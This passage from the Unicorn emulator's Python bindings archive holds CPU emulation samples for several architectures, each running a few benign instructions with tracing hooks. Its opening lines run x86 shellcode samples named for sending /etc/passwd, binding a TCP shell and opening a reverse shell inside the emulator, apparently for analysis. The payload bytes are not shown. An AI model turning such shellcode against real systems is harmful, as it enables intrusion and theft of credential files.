machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(code)) # now print out some registers print(">>> Emulation done") except UcError as e: print("ERROR: %s" % e) fd_chains.print_report() # Globals fd_chains = LogChain() id_gen = IdGenerator() if __name__ == '__main__': test_i386(X86_SEND_ETCPASSWD) test_i386(X86_BIND_TCP) test_i386(X86_REVERSE_TCP) test_i386(X86_REVERSE_TCP_2) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_ppc.py���������������������������������������������������������0000775�0000000�0000000�00000003410�14675241067�0021020�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for PPC of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # from __future__ import print_function from unicorn import * from unicorn.ppc_const import * # code to be emulated PPC_CODE = b"\x7F\x46\x1A\x14" # add r26, r6, r3 # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test PPC def test_ppc(): print("Emulate PPC code") try: # Initialize emulator in PPC EB mode mu = Uc(UC_ARCH_PPC, UC_MODE_PPC32 | UC_MODE_BIG_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, PPC_CODE) # initialize machine registers mu.reg_write(UC_PPC_REG_3, 0x1234) mu.reg_write(UC_PPC_REG_6, 0x6789) mu.reg_write(UC_PPC_REG_26, 0x5555) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(PPC_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r26 = mu.reg_read(UC_PPC_REG_26) print(">>> r26 = 0x%x" % r26) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_ppc() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_riscv.py�������������������������������������������������������0000775�0000000�0000000�00000003576�14675241067�0021401�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for RISCV of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # from __future__ import print_function from unicorn import * from unicorn.riscv_const import * ''' $ cstool riscv64 1305100093850502 0 13 05 10 00 addi a0, zero, 1 4 93 85 05 02 addi a1, a1, 0x20 ''' RISCV_CODE = b"\x13\x05\x10\x00\x93\x85\x05\x02" # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test RISCV def test_riscv(): print("Emulate RISCV code") try: # Initialize emulator in RISCV32 mode mu = Uc(UC_ARCH_RISCV, UC_MODE_RISCV32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, RISCV_CODE) # initialize machine registers mu.reg_write(UC_RISCV_REG_A0, 0x1234) mu.reg_write(UC_RISCV_REG_A1, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(RISCV_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") a0 = mu.reg_read(UC_RISCV_REG_A0) a1 = mu.reg_read(UC_RISCV_REG_A1) print(">>> A0 = 0x%x" %a0) print(">>> A1 = 0x%x" %a1) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_riscv() ����������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_s390x.py�������������������������������������������������������0000664�0000000�0000000�00000003222�14675241067�0021122�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for S390x of Unicorn. from unicorn import * from unicorn.s390x_const import * # lr %r2, %r3 S390X_CODE = b"\x18\x23" # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test RISCV def test_s390x(): print("Emulate S390X code") try: # Initialize emulator in big endian mode mu = Uc(UC_ARCH_S390X, UC_MODE_BIG_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, S390X_CODE) # initialize machine registers mu.reg_write(UC_S390X_REG_R3, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(S390X_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r2 = mu.reg_read(UC_S390X_REG_R2) r3 = mu.reg_read(UC_S390X_REG_R3) print(">>> R2 = 0x%x" % r2) print(">>> R3 = 0x%x" % r3) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_s390x() ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_sparc.py�������������������������������������������������������0000775�0000000�0000000�00000003531�14675241067�0021352�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for SPARC of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> from __future__ import print_function from unicorn import * from unicorn.sparc_const import * # code to be emulated SPARC_CODE = b"\x86\x00\x40\x02" # add %g1, %g2, %g3; # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test SPARC def test_sparc(): print("Emulate SPARC code") try: # Initialize emulator in SPARC EB mode mu = Uc(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, SPARC_CODE) # initialize machine registers mu.reg_write(UC_SPARC_REG_G1, 0x1230) mu.reg_write(UC_SPARC_REG_G2, 0x6789) mu.reg_write(UC_SPARC_REG_G3, 0x5555) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(SPARC_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") g3 = mu.reg_read(UC_SPARC_REG_G3) print(">>> G3 = 0x%x" %g3) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_sparc() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_tricore.py�����������������������������������������������������0000775�0000000�0000000�00000003256�14675241067�0021715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python ''' Created for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv ''' from __future__ import print_function from unicorn import * from unicorn.tricore_const import * # code to be emulated TRICORE_CODE = b"\x82\x11\xbb\x00\x00\x08" # mov d0, #0x1; mov.u d0, #0x8000 # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test TriCore def test_tricore(): print("Emulate TriCore code") try: # Initialize emulator in TriCore mode mu = Uc(UC_ARCH_TRICORE, UC_MODE_LITTLE_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, TRICORE_CODE) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing one instruction at ADDRESS with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(TRICORE_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r0 = mu.reg_read(UC_TRICORE_REG_D0) print(">>> D0 = 0x%x" %r0) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_tricore() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_x86.py���������������������������������������������������������0000775�0000000�0000000�00000055335�14675241067�0020700�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for X86 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> from __future__ import print_function from unicorn import * from unicorn.x86_const import * import pickle X86_CODE32 = b"\x41\x4a\x66\x0f\xef\xc1" # INC ecx; DEC edx; PXOR xmm0, xmm1 X86_CODE32_LOOP = b"\x41\x4a\xeb\xfe" # INC ecx; DEC edx; JMP self-loop X86_CODE32_JUMP = b"\xeb\x02\x90\x90\x90\x90\x90\x90" # jmp 4; nop; nop; nop; nop; nop; nop X86_CODE32_JMP_INVALID = b"\xe9\xe9\xee\xee\xee\x41\x4a" # JMP outside; INC ecx; DEC edx X86_CODE32_MEM_READ = b"\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx X86_CODE32_MEM_WRITE = b"\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx X86_CODE64 = b"\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9\x4D\x29\xF4\x49\x81\xC9\xF6\x8A\xC6\x53\x4D\x87\xED\x48\x0F\xAD\xD2\x49\xF7\xD4\x48\xF7\xE1\x4D\x19\xC5\x4D\x89\xC5\x48\xF7\xD6\x41\xB8\x4F\x8D\x6B\x59\x4D\x87\xD0\x68\x6A\x1E\x09\x3C\x59" X86_CODE32_INOUT = b"\x41\xE4\x3F\x4a\xE6\x46\x43" # INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx X86_CODE64_SYSCALL = b'\x0f\x05' # SYSCALL X86_CODE16 = b'\x00\x00' # add byte ptr [bx + si], al X86_MMIO_CODE = b"\x89\x0d\x04\x00\x02\x00\x8b\x0d\x04\x00\x02\x00" # mov [0x20004], ecx; mov ecx, [0x20004] # memory address where emulation starts ADDRESS = 0x1000000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) eflags = uc.reg_read(UC_X86_REG_EFLAGS) print(">>> --- EFLAGS is 0x%x" %eflags) def hook_code64(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) rip = uc.reg_read(UC_X86_REG_RIP) print(">>> RIP is 0x%x" %rip) # callback for tracing invalid memory access (READ or WRITE) def hook_mem_invalid(uc, access, address, size, value, user_data): if access == UC_MEM_WRITE_UNMAPPED: print(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" \ %(address, size, value)) # map this memory in with 2MB in size uc.mem_map(0xaaaa0000, 2 * 1024*1024) # return True to indicate we want to continue emulation return True else: # return False to indicate we want to stop emulation return False # callback for tracing memory access (READ or WRITE) def hook_mem_access(uc, access, address, size, value, user_data): if access == UC_MEM_WRITE: print(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" \ %(address, size, value)) else: # READ print(">>> Memory is being READ at 0x%x, data size = %u" \ %(address, size)) # callback for IN instruction def hook_in(uc, port, size, user_data): eip = uc.reg_read(UC_X86_REG_EIP) print("--- reading from port 0x%x, size: %u, address: 0x%x" %(port, size, eip)) if size == 1: # read 1 byte to AL return 0xf1 if size == 2: # read 2 byte to AX return 0xf2 if size == 4: # read 4 byte to EAX return 0xf4 # we should never reach here return 0 # callback for OUT instruction def hook_out(uc, port, size, value, user_data): eip = uc.reg_read(UC_X86_REG_EIP) print("--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x" %(port, size, value, eip)) # confirm that value is indeed the value of AL/AX/EAX v = 0 if size == 1: # read 1 byte in AL v = uc.reg_read(UC_X86_REG_AL) if size == 2: # read 2 bytes in AX v = uc.reg_read(UC_X86_REG_AX) if size == 4: # read 4 bytes in EAX v = uc.reg_read(UC_X86_REG_EAX) print("--- register value = 0x%x" %v) # Test X86 32 bit def test_i386(): print("Emulate i386 code") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) mu.reg_write(UC_X86_REG_XMM0, 0x000102030405060708090a0b0c0d0e0f) mu.reg_write(UC_X86_REG_XMM1, 0x00102030405060708090a0b0c0d0e0f0) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) r_xmm0 = mu.reg_read(UC_X86_REG_XMM0) print(">>> ECX = 0x%x" %r_ecx) print(">>> EDX = 0x%x" %r_edx) print(">>> XMM0 = 0x%.32x" %r_xmm0) # read from memory tmp = mu.mem_read(ADDRESS, 4) print(">>> Read 4 bytes from [0x%x] = 0x" %(ADDRESS), end="") for i in reversed(tmp): print("%x" %(i), end="") print("") except UcError as e: print("ERROR: %s" % e) def test_i386_map_ptr(): print("Emulate i386 code - use uc_mem_map_ptr()") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32), 2 * UC_SECOND_SCALE) # now print out some registers print(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) print(">>> ECX = 0x%x" %r_ecx) print(">>> EDX = 0x%x" %r_edx) # read from memory tmp = mu.mem_read(ADDRESS, 4) print(">>> Read 4 bytes from [0x%x] = 0x" %(ADDRESS), end="") for i in reversed(tmp): print("%x" %(i), end="") print("") except UcError as e: print("ERROR: %s" % e) def test_i386_invalid_mem_read(): print("Emulate i386 code that read from invalid memory") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_MEM_READ) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) try: # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_MEM_READ)) except UcError as e: print("Failed on uc_emu_start() with error returned 6: %s" % e) # now print out some registers print(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) print(">>> ECX = 0x%x" %r_ecx) print(">>> EDX = 0x%x" %r_edx) except UcError as e: print("ERROR: %s" % e) def test_i386_jump(): print("Emulate i386 code with jump") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_JUMP) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block, begin=ADDRESS, end=ADDRESS) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) try: # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_JUMP)) except UcError as e: print("ERROR: %s" % e) print(">>> Emulation done. Below is the CPU context") except UcError as e: print("ERROR: %s" % e) def test_i386_invalid_mem_write(): print("Emulate i386 code that write to invalid memory") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # intercept invalid memory events mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, hook_mem_invalid) try: # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_MEM_WRITE)) except UcError as e: print("ERROR: %s" % e) # now print out some registers print(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) print(">>> ECX = 0x%x" %r_ecx) print(">>> EDX = 0x%x" %r_edx) # read from memory print(">>> Read 4 bytes from [0x%x] = 0x" %(0xaaaaaaaa), end="") tmp = mu.mem_read(0xaaaaaaaa, 4) for i in reversed(tmp): if i != 0: print("%x" %i, end="") print("") try: tmp = mu.mem_read(0xffffffaa, 4) print(">>> Read 4 bytes from [0x%x] = 0x" %(0xffffffaa), end="") for i in reversed(tmp): print("%x" %i, end="") print("") except UcError as e: print(">>> Failed to read 4 bytes from [0xffffffaa]") except UcError as e: print("ERROR: %s" % e) def test_i386_jump_invalid(): print("Emulate i386 code that jumps to invalid memory") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_JMP_INVALID) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) try: mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_JMP_INVALID)) except UcError as e: print("Failed on uc_emu_start() with error returned 8: %s" %e) print(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) print(">>> ECX = 0x%x" %r_ecx) print(">>> EDX = 0x%x" %r_edx) except UcError as e: print("ERROR %s" % e) def test_i386_loop(): print("Emulate i386 code that loop forever") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_LOOP) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_LOOP), timeout=2*UC_SECOND_SCALE) print(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) print(">>> ECX = 0x%x" %r_ecx) print(">>> EDX = 0x%x" %r_edx) except UcError as e: print("ERROR: %s" % e) # Test X86 32 bit with IN/OUT instruction def test_i386_inout(): print("Emulate i386 code with IN/OUT instructions") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_INOUT) # initialize machine registers mu.reg_write(UC_X86_REG_EAX, 0x1234) mu.reg_write(UC_X86_REG_ECX, 0x6789) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # handle IN & OUT instruction mu.hook_add(UC_HOOK_INSN, hook_in, None, 1, 0, UC_X86_INS_IN) mu.hook_add(UC_HOOK_INSN, hook_out, None, 1, 0, UC_X86_INS_OUT) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_INOUT)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_eax = mu.reg_read(UC_X86_REG_EAX) print(">>> EAX = 0x%x" %r_eax) print(">>> ECX = 0x%x" %r_ecx) except UcError as e: print("ERROR: %s" % e) def test_i386_context_save(): print("Save/restore CPU context in opaque blob") address = 0 code = b'\x40' # inc eax try: # Initialize emulator mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 8KB memory for this emulation mu.mem_map(address, 8 * 1024, UC_PROT_ALL) # write machine code to be emulated to memory mu.mem_write(address, code) # set eax to 1 mu.reg_write(UC_X86_REG_EAX, 1) print(">>> Running emulation for the first time") mu.emu_start(address, address+1) print(">>> Emulation done. Below is the CPU context") print(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) print(">>> Saving CPU context") saved_context = mu.context_save() print(">>> Pickling CPU context") pickled_saved_context = pickle.dumps(saved_context) print(">>> Running emulation for the second time") mu.emu_start(address, address+1) print(">>> Emulation done. Below is the CPU context") print(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) print(">>> Unpickling CPU context") saved_context = pickle.loads(pickled_saved_context) print(">>> Modifying some register.") saved_context.reg_write(UC_X86_REG_EAX, 0xc8c8) print(">>> CPU context restored. Below is the CPU context") mu.context_restore(saved_context) print(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) except UcError as e: print("ERROR: %s" % e) def test_x86_64(): print("Emulate x86_64 code") try: # Initialize emulator in X86-64bit mode mu = Uc(UC_ARCH_X86, UC_MODE_64) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE64) # initialize machine registers mu.reg_write(UC_X86_REG_RAX, 0x71f3029efd49d41d) mu.reg_write(UC_X86_REG_RBX, 0xd87b45277f133ddb) mu.reg_write(UC_X86_REG_RCX, 0xab40d1ffd8afc461) mu.reg_write(UC_X86_REG_RDX, 0x919317b4a733f01) mu.reg_write(UC_X86_REG_RSI, 0x4c24e753a17ea358) mu.reg_write(UC_X86_REG_RDI, 0xe509a57d2571ce96) mu.reg_write(UC_X86_REG_R8, 0xea5b108cc2b9ab1f) mu.reg_write(UC_X86_REG_R9, 0x19ec097c8eb618c1) mu.reg_write(UC_X86_REG_R10, 0xec45774f00c5f682) mu.reg_write(UC_X86_REG_R11, 0xe17e9dbec8c074aa) mu.reg_write(UC_X86_REG_R12, 0x80f86a8dc0f6d457) mu.reg_write(UC_X86_REG_R13, 0x48288ca5671c5492) mu.reg_write(UC_X86_REG_R14, 0x595f72f6e4017f6e) mu.reg_write(UC_X86_REG_R15, 0x1efd97aea331cccc) # setup stack mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions in range [ADDRESS, ADDRESS+20] mu.hook_add(UC_HOOK_CODE, hook_code64, None, ADDRESS, ADDRESS+20) # tracing all memory READ & WRITE access mu.hook_add(UC_HOOK_MEM_WRITE, hook_mem_access) mu.hook_add(UC_HOOK_MEM_READ, hook_mem_access) # actually you can also use READ_WRITE to trace all memory access #mu.hook_add(UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, hook_mem_access) try: # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE64)) except UcError as e: print("ERROR: %s" % e) # now print out some registers print(">>> Emulation done. Below is the CPU context") rax = mu.reg_read(UC_X86_REG_RAX) rbx = mu.reg_read(UC_X86_REG_RBX) rcx = mu.reg_read(UC_X86_REG_RCX) rdx = mu.reg_read(UC_X86_REG_RDX) rsi = mu.reg_read(UC_X86_REG_RSI) rdi = mu.reg_read(UC_X86_REG_RDI) r8 = mu.reg_read(UC_X86_REG_R8) r9 = mu.reg_read(UC_X86_REG_R9) r10 = mu.reg_read(UC_X86_REG_R10) r11 = mu.reg_read(UC_X86_REG_R11) r12 = mu.reg_read(UC_X86_REG_R12) r13 = mu.reg_read(UC_X86_REG_R13) r14 = mu.reg_read(UC_X86_REG_R14) r15 = mu.reg_read(UC_X86_REG_R15) print(">>> RAX = 0x%x" %rax) print(">>> RBX = 0x%x" %rbx) print(">>> RCX = 0x%x" %rcx) print(">>> RDX = 0x%x" %rdx) print(">>> RSI = 0x%x" %rsi) print(">>> RDI = 0x%x" %rdi) print(">>> R8 = 0x%x" %r8) print(">>> R9 = 0x%x" %r9) print(">>> R10 = 0x%x" %r10) print(">>> R11 = 0x%x" %r11) print(">>> R12 = 0x%x" %r12) print(">>> R13 = 0x%x" %r13) print(">>> R14 = 0x%x" %r14) print(">>> R15 = 0x%x" %r15) except UcError as e: print("ERROR: %s" % e) def test_x86_64_syscall(): print("Emulate x86_64 code with 'syscall' instruction") try: # Initialize emulator in X86-64bit mode mu = Uc(UC_ARCH_X86, UC_MODE_64) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE64_SYSCALL) def hook_syscall(mu, user_data): rax = mu.reg_read(UC_X86_REG_RAX) if rax == 0x100: mu.reg_write(UC_X86_REG_RAX, 0x200) else: print('ERROR: was not expecting rax=%d in syscall' % rax) # hook interrupts for syscall mu.hook_add(UC_HOOK_INSN, hook_syscall, None, 1, 0, UC_X86_INS_SYSCALL) # syscall handler is expecting rax=0x100 mu.reg_write(UC_X86_REG_RAX, 0x100) try: # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE64_SYSCALL)) except UcError as e: print("ERROR: %s" % e) # now print out some registers print(">>> Emulation done. Below is the CPU context") rax = mu.reg_read(UC_X86_REG_RAX) print(">>> RAX = 0x%x" % rax) except UcError as e: print("ERROR: %s" % e) def test_x86_16(): print("Emulate x86 16-bit code") try: # Initialize emulator in X86-16bit mode mu = Uc(UC_ARCH_X86, UC_MODE_16) # map 8KB memory for this emulation mu.mem_map(0, 8 * 1024) # set CPU registers mu.reg_write(UC_X86_REG_EAX, 7) mu.reg_write(UC_X86_REG_EBX, 5) mu.reg_write(UC_X86_REG_ESI, 6) # write machine code to be emulated to memory mu.mem_write(0, X86_CODE16) # emulate machine code in infinite time mu.emu_start(0, len(X86_CODE16)) # now print out some registers print(">>> Emulation done. Below is the CPU context") tmp = mu.mem_read(11, 1) print(">>> Read 1 bytes from [0x%x] = 0x%x" %(11, tmp[0])) except UcError as e: print("ERROR: %s" % e) def mmio_read_cb(uc, offset, size, data): print(f">>> Read IO memory at offset {hex(offset)} with {hex(size)} bytes and return 0x19260817") return 0x19260817 def mmio_write_cb(uc, offset, size, value, data): 